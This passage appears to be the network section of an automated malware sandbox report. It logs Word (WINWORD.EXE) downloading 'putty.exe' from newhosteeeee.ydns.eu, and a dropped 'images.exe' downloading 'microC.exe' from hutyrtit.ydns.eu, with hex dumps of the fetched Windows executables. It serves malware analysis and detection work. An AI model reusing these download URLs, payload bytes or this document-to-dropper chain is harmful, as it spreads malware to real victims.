                                Data Ascii: (joot6o*07{+(W1{+(U1*0rp+*0r'p+*0+*0*0(r5p(+*0(r
                                Aug 2, 2021 10:59:54.282511950 CEST | 10 | IN | Data Raw: 1f 37 73 60 00 00 0a 28 bf 00 00 0a 00 02 28 6a 00 00 0a 02 6f 6c 00 00 06 6f 6b 00 00 0a 00 02 16 28 c0 00 00 0a 00 02 16 28 c1 00 00 0a 00 02 72 05 04 00 70 28 5f 00 00 0a 00 02 16 28 c2 00 00 0a 00 02 18 28 c3 00 00 0a 00 02 72 21 04 00 70 6f
                                Data Ascii: 7s`((jolok((rp(_((r!poolonoloo(n*&{.+*"}.*&{/+*"}/*&{0+*"}0*&{1+*"}1*&{2+*07us{2
                                Aug 2, 2021 10:59:54.282535076 CEST | 11 | IN | Data Raw: 6f d9 00 00 06 00 02 73 de 00 00 0a 6f db 00 00 06 00 02 73 d8 00 00 0a 6f dd 00 00 06 00 02 73 d8 00 00 0a 6f df 00 00 06 00 02 73 d8 00 00 0a 6f e1 00 00 06 00 02 73 d8 00 00 0a 6f f5 00 00 06 00 02 73 d8 00 00 0a 6f ef 00 00 06 00 02 73 d8 00
                                Data Ascii: ososososososososososoo|oWooVooWooWooVooWooVooWooVooW
                                Aug 2, 2021 10:59:54.282556057 CEST | 13 | IN | Data Raw: 6f 5f 00 00 0a 00 02 6f 8a 00 00 06 1b 73 6c 00 00 0a 6f ee 00 00 0a 00 02 6f 8a 00 00 06 20 d4 01 00 00 20 82 01 00 00 73 60 00 00 0a 6f 61 00 00 0a 00 02 6f 8a 00 00 06 1b 6f 62 00 00 0a 00 02 6f 8c 00 00 06 17 6f ea 00 00 0a 00 02 6f 8c 00 00
                                Data Ascii: o_osloo s`oaooboooor@porpsoos[o\orpo_os]oo s`oaooborpoooo
                                Aug 2, 2021 10:59:54.282576084 CEST | 14 | IN | Data Raw: 06 17 6f 7e 00 00 0a 00 02 6f ae 00 00 06 16 6f 7f 00 00 0a 00 02 6f ae 00 00 06 19 6f b3 00 00 0a 00 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00
                                Data Ascii: o~ooooooso&ooso&ooso&oo"Aso&ooooooooooooo s[o\orpo_
                                Aug 2, 2021 10:59:54.282597065 CEST | 15 | IN | Data Raw: 06 00 70 02 6f 86 00 00 06 72 55 0a 00 70 17 17 73 f1 00 00 0a 6f ed 00 00 0a 00 02 6f b8 00 00 06 19 1c 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f b8 00 00 06 72 65 0a 00 70 6f 5f 00 00 0a 00 02 6f b8 00 00 06 1f 0f 1f 0e 73 60 00 00 0a 6f 61 00 00
                                Data Ascii: porUpsoos[o\orepo_os`oaooboooor<porUpsooor porypsoos[o\orpo_o3s`oa


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                1 | 192.168.2.22 | 49166 | 203.159.80.186 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 2, 2021 10:59:57.762746096 CEST | 778 | OUT | GET /putty.exe HTTP/1.1
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:57.833343983 CEST | 779 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:57 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 
aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets
                                Aug 2, 2021 10:59:57.833374023 CEST | 780 | IN | Data Raw: 46 00 00 0a 28 44 00 00 0a 80 0a 00 00 04 2a 1e 02 28 47 00 00 0a 2a 00 13 30 01 00 1d 00 00 00 09 00 00 11 00 28 07 00 00 06 6f 48 00 00 0a 0a 06 2c 0c 28 13 00 00 06 6f 49 00 00 0a 00 00 00 2a 00 00 00 1b 30 03 00 65 00 00 00 0a 00 00 11 00 7e
                                Data Ascii: F(D*(G*0(oH,(oI*0e~,M~(J(K~,(sLoM(N~+*"-O0(+*(F*&}*
                                Aug 2, 2021 10:59:57.833385944 CEST | 782 | IN | Data Raw: 61 00 00 0a 00 02 6f 2c 00 00 06 1a 6f 62 00 00 0a 00 02 6f 2c 00 00 06 72 39 01 00 70 6f 63 00 00 0a 00 02 6f 2e 00 00 06 1f 78 1f 5e 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f 2e 00 00 06 72 45 01 00 70 6f 5f 00 00 0a 00 02 6f 2e 00 00 06 20 a8 00
                                Data Ascii: ao,obo,r9poco.x^s[o\o.rEpo_o. s`oao.obo0oXo0rop"AsYoZo0ds[o\o0s]o^o0rWpo_o0*s`oao0ob
                                Aug 2, 2021 10:59:57.833421946 CEST | 783 | IN | Data Raw: 6f 32 00 00 06 6f 73 00 00 0a 00 2a 13 30 03 00 5c 00 00 00 09 00 00 11 00 02 6f 24 00 00 06 6f 74 00 00 0a 6f 75 00 00 0a 16 fe 01 0a 06 2c 22 04 17 6f 76 00 00 0a 00 02 6f 36 00 00 06 02 6f 24 00 00 06 72 c5 01 00 70 6f 77 00 00 0a 00 00 2b 21
                                Data Ascii: o2os*0\o$otou,"ovo6o$rpow+!ovo6o$rpow*0\o*otou,"ovo6o*rpow+!ovo6o*rpow*0\o.ot
                                Aug 2, 2021 10:59:57.862334967 CEST | 785 | IN | Data Raw: 00 02 28 88 00 00 0a 00 00 00 2a 00 00 00 13 30 01 00 0c 00 00 00 14 00 00 11 00 02 7b 20 00 00 04 0a 2b 00 06 2a 13 30 02 00 55 00 00 00 15 00 00 11 00 03 1f 18 fe 04 0a 06 2c 04 1f 18 10 01 03 20 2c 01 00 00 fe 02 0b 07 2c 07 20 2c 01 00 00 10
                                Data Ascii: (*0{ +*0U, ,, ,{ ,"} {}(X(*0{!+*0M,,{!,"}!{}(X(
                                Aug 2, 2021 10:59:57.862365961 CEST | 786 | IN | Data Raw: 00 0a 02 28 6a 00 00 0a 6f 86 00 00 0a 17 da 6f 87 00 00 0a 74 36 00 00 01 6f 9d 00 00 0a 00 2a 13 30 02 00 37 00 00 00 18 00 00 11 00 02 7b 1d 00 00 04 0a 17 0b 2b 0b 02 28 57 00 00 06 00 07 17 d6 0b 07 06 31 f1 02 7b 1e 00 00 04 0c 17 0d 2b 0c
                                Data Ascii: (joot6o*07{+(W1{+(U1*0rp+*0r'p+*0+*0*0(r5p(+*0(r
                                Aug 2, 2021 10:59:57.862379074 CEST | 787 | IN | Data Raw: 1f 37 73 60 00 00 0a 28 bf 00 00 0a 00 02 28 6a 00 00 0a 02 6f 6c 00 00 06 6f 6b 00 00 0a 00 02 16 28 c0 00 00 0a 00 02 16 28 c1 00 00 0a 00 02 72 05 04 00 70 28 5f 00 00 0a 00 02 16 28 c2 00 00 0a 00 02 18 28 c3 00 00 0a 00 02 72 21 04 00 70 6f
                                Data Ascii: 7s`((jolok((rp(_((r!poolonoloo(n*&{.+*"}.*&{/+*"}/*&{0+*"}0*&{1+*"}1*&{2+*07us{2
                                Aug 2, 2021 10:59:57.862413883 CEST | 789 | IN | Data Raw: 6f d9 00 00 06 00 02 73 de 00 00 0a 6f db 00 00 06 00 02 73 d8 00 00 0a 6f dd 00 00 06 00 02 73 d8 00 00 0a 6f df 00 00 06 00 02 73 d8 00 00 0a 6f e1 00 00 06 00 02 73 d8 00 00 0a 6f f5 00 00 06 00 02 73 d8 00 00 0a 6f ef 00 00 06 00 02 73 d8 00
                                Data Ascii: ososososososososososoo|oWooVooWooWooVooWooVooWooVooW
                                Aug 2, 2021 10:59:57.862435102 CEST | 790 | IN | Data Raw: 6f 5f 00 00 0a 00 02 6f 8a 00 00 06 1b 73 6c 00 00 0a 6f ee 00 00 0a 00 02 6f 8a 00 00 06 20 d4 01 00 00 20 82 01 00 00 73 60 00 00 0a 6f 61 00 00 0a 00 02 6f 8a 00 00 06 1b 6f 62 00 00 0a 00 02 6f 8c 00 00 06 17 6f ea 00 00 0a 00 02 6f 8c 00 00
                                Data Ascii: o_osloo s`oaooboooor@porpsoos[o\orpo_os]oo s`oaooborpoooo
                                Aug 2, 2021 10:59:57.862456083 CEST | 791 | IN | Data Raw: 06 17 6f 7e 00 00 0a 00 02 6f ae 00 00 06 16 6f 7f 00 00 0a 00 02 6f ae 00 00 06 19 6f b3 00 00 0a 00 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00
                                Data Ascii: o~ooooooso&ooso&ooso&oo"Aso&ooooooooooooo s[o\orpo_
                                Aug 2, 2021 10:59:57.891263008 CEST793INData Raw: 06 00 70 02 6f 86 00 00 06 72 55 0a 00 70 17 17 73 f1 00 00 0a 6f ed 00 00 0a 00 02 6f b8 00 00 06 19 1c 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f b8 00 00 06 72 65 0a 00 70 6f 5f 00 00 0a 00 02 6f b8 00 00 06 1f 0f 1f 0e 73 60 00 00 0a 6f 61 00 00
                                Data Ascii: porUpsoos[o\orepo_os`oaooboooor<porUpsooor porypsoos[o\orpo_o3s`oa


                                Session ID: 2 | Source IP: 192.168.2.22 | Source Port: 49167 | Destination IP: 203.159.80.186 | Destination Port: 80 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 2, 2021 10:59:58.669049025 CEST | 1537 | OUT | GET /putty.exe HTTP/1.1
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:58.711807013 CEST | 1538 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:57 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 
aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets
                                Aug 2, 2021 10:59:58.711848974 CEST1540INData Raw: 46 00 00 0a 28 44 00 00 0a 80 0a 00 00 04 2a 1e 02 28 47 00 00 0a 2a 00 13 30 01 00 1d 00 00 00 09 00 00 11 00 28 07 00 00 06 6f 48 00 00 0a 0a 06 2c 0c 28 13 00 00 06 6f 49 00 00 0a 00 00 00 2a 00 00 00 1b 30 03 00 65 00 00 00 0a 00 00 11 00 7e
                                Data Ascii: F(D*(G*0(oH,(oI*0e~,M~(J(K~,(sLoM(N~+*"-O0(+*(F*&}*
                                Aug 2, 2021 10:59:58.711873055 CEST1541INData Raw: 61 00 00 0a 00 02 6f 2c 00 00 06 1a 6f 62 00 00 0a 00 02 6f 2c 00 00 06 72 39 01 00 70 6f 63 00 00 0a 00 02 6f 2e 00 00 06 1f 78 1f 5e 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f 2e 00 00 06 72 45 01 00 70 6f 5f 00 00 0a 00 02 6f 2e 00 00 06 20 a8 00
                                Data Ascii: ao,obo,r9poco.x^s[o\o.rEpo_o. s`oao.obo0oXo0rop"AsYoZo0ds[o\o0s]o^o0rWpo_o0*s`oao0ob
                                Aug 2, 2021 10:59:58.711899042 CEST1542INData Raw: 6f 32 00 00 06 6f 73 00 00 0a 00 2a 13 30 03 00 5c 00 00 00 09 00 00 11 00 02 6f 24 00 00 06 6f 74 00 00 0a 6f 75 00 00 0a 16 fe 01 0a 06 2c 22 04 17 6f 76 00 00 0a 00 02 6f 36 00 00 06 02 6f 24 00 00 06 72 c5 01 00 70 6f 77 00 00 0a 00 00 2b 21
                                Data Ascii: o2os*0\o$otou,"ovo6o$rpow+!ovo6o$rpow*0\o*otou,"ovo6o*rpow+!ovo6o*rpow*0\o.ot
                                Aug 2, 2021 10:59:58.741183996 CEST1544INData Raw: 00 02 28 88 00 00 0a 00 00 00 2a 00 00 00 13 30 01 00 0c 00 00 00 14 00 00 11 00 02 7b 20 00 00 04 0a 2b 00 06 2a 13 30 02 00 55 00 00 00 15 00 00 11 00 03 1f 18 fe 04 0a 06 2c 04 1f 18 10 01 03 20 2c 01 00 00 fe 02 0b 07 2c 07 20 2c 01 00 00 10
                                Data Ascii: (*0{ +*0U, ,, ,{ ,"} {}(X(*0{!+*0M,,{!,"}!{}(X(
                                Aug 2, 2021 10:59:58.741218090 CEST1545INData Raw: 00 0a 02 28 6a 00 00 0a 6f 86 00 00 0a 17 da 6f 87 00 00 0a 74 36 00 00 01 6f 9d 00 00 0a 00 2a 13 30 02 00 37 00 00 00 18 00 00 11 00 02 7b 1d 00 00 04 0a 17 0b 2b 0b 02 28 57 00 00 06 00 07 17 d6 0b 07 06 31 f1 02 7b 1e 00 00 04 0c 17 0d 2b 0c
                                Data Ascii: (joot6o*07{+(W1{+(U1*0rp+*0r'p+*0+*0*0(r5p(+*0(r
                                Aug 2, 2021 10:59:58.741241932 CEST1547INData Raw: 1f 37 73 60 00 00 0a 28 bf 00 00 0a 00 02 28 6a 00 00 0a 02 6f 6c 00 00 06 6f 6b 00 00 0a 00 02 16 28 c0 00 00 0a 00 02 16 28 c1 00 00 0a 00 02 72 05 04 00 70 28 5f 00 00 0a 00 02 16 28 c2 00 00 0a 00 02 18 28 c3 00 00 0a 00 02 72 21 04 00 70 6f
                                Data Ascii: 7s`((jolok((rp(_((r!poolonoloo(n*&{.+*"}.*&{/+*"}/*&{0+*"}0*&{1+*"}1*&{2+*07us{2
                                Aug 2, 2021 10:59:58.741264105 CEST1548INData Raw: 6f d9 00 00 06 00 02 73 de 00 00 0a 6f db 00 00 06 00 02 73 d8 00 00 0a 6f dd 00 00 06 00 02 73 d8 00 00 0a 6f df 00 00 06 00 02 73 d8 00 00 0a 6f e1 00 00 06 00 02 73 d8 00 00 0a 6f f5 00 00 06 00 02 73 d8 00 00 0a 6f ef 00 00 06 00 02 73 d8 00
                                Data Ascii: ososososososososososoo|oWooVooWooWooVooWooVooWooVooW
                                Aug 2, 2021 10:59:58.741287947 CEST1549INData Raw: 6f 5f 00 00 0a 00 02 6f 8a 00 00 06 1b 73 6c 00 00 0a 6f ee 00 00 0a 00 02 6f 8a 00 00 06 20 d4 01 00 00 20 82 01 00 00 73 60 00 00 0a 6f 61 00 00 0a 00 02 6f 8a 00 00 06 1b 6f 62 00 00 0a 00 02 6f 8c 00 00 06 17 6f ea 00 00 0a 00 02 6f 8c 00 00
                                Data Ascii: o_osloo s`oaooboooor@porpsoos[o\orpo_os]oo s`oaooborpoooo
                                Aug 2, 2021 10:59:58.741311073 CEST1551INData Raw: 06 17 6f 7e 00 00 0a 00 02 6f ae 00 00 06 16 6f 7f 00 00 0a 00 02 6f ae 00 00 06 19 6f b3 00 00 0a 00 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00 00 06 6f b4 00 00 0a 73 f0 00 00 0a 6f b6 00 00 0a 26 02 6f ae 00
                                Data Ascii: o~ooooooso&ooso&ooso&oo"Aso&ooooooooooooo s[o\orpo_
                                Aug 2, 2021 10:59:58.741338015 CEST1552INData Raw: 06 00 70 02 6f 86 00 00 06 72 55 0a 00 70 17 17 73 f1 00 00 0a 6f ed 00 00 0a 00 02 6f b8 00 00 06 19 1c 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f b8 00 00 06 72 65 0a 00 70 6f 5f 00 00 0a 00 02 6f b8 00 00 06 1f 0f 1f 0e 73 60 00 00 0a 6f 61 00 00
                                Data Ascii: porUpsoos[o\orepo_os`oaooboooor<porUpsooor porypsoos[o\orpo_o3s`oa


                                Session ID: 3 | Source IP: 192.168.2.22 | Source Port: 49169 | Destination IP: 203.159.80.165 | Destination Port: 80 | Process: C:\ProgramData\images.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 2, 2021 11:00:29.636285067 CEST | 2381 | OUT | GET /microC.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: hutyrtit.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 11:00:29.667159081 CEST | 2383 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Mon, 02 Aug 2021 07:13:53 GMT
                                Accept-Ranges: bytes
                                ETag: "382415f36d87d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 09:00:29 GMT
                                Content-Length: 1378816
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 
